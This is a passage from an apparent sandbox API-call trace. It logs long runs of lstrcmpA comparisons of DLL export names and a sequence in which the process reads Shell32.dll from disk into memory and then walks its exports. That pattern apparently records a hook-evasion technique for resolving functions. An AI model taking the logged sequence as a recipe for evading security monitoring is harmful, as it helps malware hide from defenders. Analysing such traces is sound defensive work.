lpString2="AlpcRegisterCompletionList") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.897] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.897] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.897] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.897] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0240.897] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0240.897] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0240.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0240.898] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0240.899] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.900] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0240.901] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0240.901] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0240.901] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0240.901] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0240.901] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0241.110] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0241.111] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0244.795] GetProcessHeap () returned 0x430000 [0244.795] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4056040 | out: hHeap=0x430000) returned 1 [0244.805] GetProcessHeap () returned 0x430000 [0244.805] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449920 [0244.805] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0244.805] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0244.805] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0244.805] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0244.806] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0244.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0244.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0244.807] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0244.807] GetProcessHeap () returned 0x430000 [0244.807] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1587258) returned 0x405d040 [0245.114] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0245.114] ReadFile (in: hFile=0x140, lpBuffer=0x405d040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x405d040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0248.527] CloseHandle (hObject=0x140) returned 1 [0248.528] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0248.528] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0248.528] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0248.529] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0248.529] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0248.529] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0248.529] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0248.529] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0248.529] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.529] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0248.529] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0248.529] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0248.529] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.529] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0248.529] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0248.529] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0248.529] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0248.529] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.530] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0248.530] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.530] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.530] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0248.530] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0248.530] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0248.530] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0248.531] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0248.531] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.532] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0248.532] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0248.532] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0248.533] lstrcmpA 